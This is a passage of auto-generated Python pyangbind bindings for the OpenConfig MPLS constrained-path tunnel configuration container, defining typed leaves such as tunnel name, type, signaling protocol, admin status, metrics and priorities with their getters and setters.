defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
self.__type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__signaling_protocol = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="signaling-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__description = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="description",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
self.__admin_status = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:ADMIN_UP"),
is_leaf=True,
yang_name="admin-status",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__preference = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["1..255"]},
),
is_leaf=True,
yang_name="preference",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["-2147483648..2147483647"]},
int_size=32,
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="int32",
is_config=True,
)
self.__shortcut_eligible = YANGDynClass(
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="shortcut-eligible",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
self.__protection_style_requested = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:UNPROTECTED"),
is_leaf=True,
yang_name="protection-style-requested",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__reoptimize_timer = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="reoptimize-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
self.__source = YANGDynClass(
base=[
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
],
is_leaf=True,
yang_name="source",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address",
is_config=True,
)
self.__soft_preemption = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="soft-preemption",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
self.__setup_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
7
),
is_leaf=True,
yang_name="setup-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
self.__hold_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
0
),
is_leaf=True,
yang_name="hold-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"mpls",
"lsps",
"constrained-path",
"tunnels",
"tunnel",
"config",
]
def _get_name(self):
"""
Getter method for name, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/name (string)
YANG Description: The tunnel name
"""
return self.__name
def _set_name(self, v, load=False):
"""
Setter method for name, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_name() directly.
YANG Description: The tunnel name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """name must be of a type compatible with string""",
"defined-type": "string",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='string', is_config=True)""",
}
)
self.__name = t
if hasattr(self, "_set"):
self._set()
def _unset_name(self):
self.__name = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
def _get_type(self):
"""
Getter method for type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/type (identityref)
YANG Description: Tunnel type, p2p or p2mp
"""
return self.__type
def _set_type(self, v, load=False):
"""
Setter method for type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/type (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_type() directly.
YANG Description: Tunnel type, p2p or p2mp
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """type must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__type = t
if hasattr(self, "_set"):
self._set()
def _unset_type(self):
self.__type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_signaling_protocol(self):
"""
Getter method for signaling_protocol, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/signaling_protocol (identityref)
YANG Description: Signaling protocol used to set up this tunnel
"""
return self.__signaling_protocol
def _set_signaling_protocol(self, v, load=False):
"""
Setter method for signaling_protocol, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/signaling_protocol (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_signaling_protocol is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_signaling_protocol() directly.
YANG Description: Signaling protocol used to set up this tunnel
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="signaling-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """signaling_protocol must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), is_leaf=True, yang_name="signaling-protocol", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__signaling_protocol = t
if hasattr(self, "_set"):
self._set()
def _unset_signaling_protocol(self):
self.__signaling_protocol = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="signaling-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_description(self):
"""
Getter method for description, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/description (string)
YANG Description: optional text description for the tunnel
"""
return self.__description
def _set_description(self, v, load=False):
"""
Setter method for description, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/description (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_description is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_description() directly.
YANG Description: optional text description for the tunnel
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="description",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """description must be of a type compatible with string""",
"defined-type": "string",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='string', is_config=True)""",
}
)
self.__description = t
if hasattr(self, "_set"):
self._set()
def _unset_description(self):
self.__description = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="description",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
def _get_admin_status(self):
"""
Getter method for admin_status, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/admin_status (identityref)
YANG Description: TE tunnel administrative state.
"""
return self.__admin_status
def _set_admin_status(self, v, load=False):
"""
Setter method for admin_status, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/admin_status (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_admin_status is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_admin_status() directly.
YANG Description: TE tunnel administrative state.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_UP": {
"@module": "openconfig-mpls-types",
